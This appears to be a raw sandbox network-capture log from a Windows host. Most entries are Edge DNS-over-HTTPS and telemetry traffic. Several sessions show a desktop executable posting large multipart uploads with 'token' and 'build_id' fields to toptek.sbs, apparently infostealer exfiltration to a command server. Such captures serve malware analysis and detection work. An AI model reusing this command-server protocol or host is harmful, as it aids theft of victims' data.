2024-12-23 05:57:56 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661df1d9830f75-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 25 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom%#)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49828 | 162.159.61.3 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:55 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
2024-12-23 05:57:55 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-23 05:57:56 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 05:57:56 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f661df1e86043bc-EWR
alt-svc: h3=":443"; ma=86400
2024-12-23 05:57:56 UTC | 468 | IN | Data Ascii: wwwgstaticcomPc)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49829 | 162.159.61.3 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:55 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 05:57:55 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-23 05:57:56 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 05:57:56 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f661df1ee1d17b5-EWR
alt-svc: h3=":443"; ma=86400
2024-12-23 05:57:56 UTC | 468 | IN | Data Ascii: wwwgstaticcom@C)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49834 | 172.64.41.3 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:55 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 05:57:55 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-23 05:57:56 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 05:57:56 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f661df1ec2b42c6-EWR
alt-svc: h3=":443"; ma=86400
2024-12-23 05:57:56 UTC | 468 | IN | Data Ascii: wwwgstaticcom )


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49835 | 172.64.41.3 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:55 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 05:57:55 UTC | 128 | OUT | Data Ascii: wwwgstaticcom)TP
2024-12-23 05:57:56 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 05:57:56 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f661df1e86043b2-EWR
alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 20 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom Hc)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49822 | 172.64.41.3 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:55 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:55 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
2024-12-23 05:57:56 UTC | 247 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:56 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661df1eb8e42c0-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:56 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f1 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49823 | 142.250.181.65 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:56 UTC | 594 | OUT | GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-23 05:57:57 UTC | 570 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Content-Length: 154477
                                                                                                                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6peKbeaD5AAOFIFpIY4iRMz0r723tdQqjZ-_sZLw4H2KJ7KzMpVkWBpbUuXqhVSHwrJ2iSn3M
                                                                                                                                                                                                                                                                                    X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                                                                                                                    Date: Sun, 22 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                    Expires: Mon, 22 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                    Age: 50382
                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                    ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                    Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49851 | 162.159.61.3 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:57 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 05:57:57 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 05:57:57 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f661dfa28f48c4b-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49845 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:57 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----1NYU3WL6P8YMYM7QI589
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 68733
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:58 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:57:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-23 05:57:58 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 49852 | 172.64.41.3 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:57 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 05:57:57 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 05:57:57 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f661dfa9cfd428b-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 49853 | 172.64.41.3 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:57 UTC | 245 | OUT | POST /dns-query HTTP/1.1
Host: chrome.cloudflare-dns.com
Connection: keep-alive
Content-Length: 128
Accept: application/dns-message
Accept-Language: *
User-Agent: Chrome
Accept-Encoding: identity
Content-Type: application/dns-message
2024-12-23 05:57:57 UTC | 247 | IN | HTTP/1.1 200 OK
Server: cloudflare
Date: Mon, 23 Dec 2024 05:57:57 GMT
Content-Type: application/dns-message
Connection: close
Access-Control-Allow-Origin: *
Content-Length: 468
CF-RAY: 8f661dfb184678e2-EWR
alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 49860 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:57:59 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----3ECBI589Z58QQQ168Q16
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 262605
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:57:59 UTC | 16355 | OUT | Data Ascii:
------3ECBI589Z58QQQ168Q16
Content-Disposition: form-data; name="token"

56d79d211678d143c3e6bd8262e8a87a
------3ECBI589Z58QQQ168Q16
Content-Disposition: form-data; name="build_id"

fd61cf430a3abb74efa4762c20194727
------3ECBI589Z58QQQ168Q16
Cont
2024-12-23 05:58:01 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 23 Dec 2024 05:58:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49868 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:00 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----Q1N7GVSR9H47QQ1V3WLN
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 393697
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-23 05:58:00 UTC | 16355 | OUT | Data Ascii: ------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------Q1N7GVSR9H47QQ1V3WLNContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------Q1N7GVSR9H47QQ1V3WLNCont
2024-12-23 05:58:02 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:02 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49841 | 18.165.220.110 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:02 UTC | 925 | OUT | GET /b?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-23 05:58:03 UTC | 955 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:02 GMT
                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                    Location: /b2?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                    set-cookie: UID=1B5aaed1ef292e4cd07b08d1734933482; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                    set-cookie: XID=1B5aaed1ef292e4cd07b08d1734933482; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                    Via: 1.1 5008327c23740ce2f9d9ed54c8a489e8.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: BAH53-P1
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: jfUNmv2GAoYVzmXVfm5S6sqvX2QZnNnHbz8zDS2VRiq4nD4emVYDig==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49882 | 94.130.188.57 | 443 | 5564 | C:\Users\user\Desktop\gVKsiQIHqe.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:03 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----UKNYCTR900ZU3EU3W4WB
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 131557
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
2024-12-23 05:58:03 UTC | 16355 | OUT | Data Ascii: ------UKNYCTR900ZU3EU3W4WBContent-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------UKNYCTR900ZU3EU3W4WBContent-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------UKNYCTR900ZU3EU3W4WBCont
2024-12-23 05:58:05 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:05 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
2024-12-23 05:58:05 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49888 | 20.189.173.14 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:04 UTC | 1082 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933482034&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 3869
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=1527A764E6A86BDB2DE6B23AE7AF6A4B; _EDGE_S=F=1&SID=274477A862C669B72E1F62F6631E6834; _EDGE_V=1
2024-12-23 05:58:04 UTC | 3869 | OUT | Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-23T05:58:02.029Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"44ddae61-a74d-47c9-9205-5b5b0005318d","epoch":"1401016166"},"app":{"locale
2024-12-23 05:58:05 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=dbe504bc11824d96821072a812ec1db3&HASH=dbe5&LV=202412&V=4&LU=1734933484738; Domain=.microsoft.com; Expires=Tue, 23 Dec 2025 05:58:04 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=94ca4a41cc11405b9fb0cbaab7ebe03b; Domain=.microsoft.com; Expires=Mon, 23 Dec 2024 06:28:04 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                    time-delta-millis: 2704
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:58:04 GMT
                                                                                                                                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49897 | 18.164.116.39 | 443 | 7432 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 05:58:04 UTC | 1012 | OUT | GET /b2?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
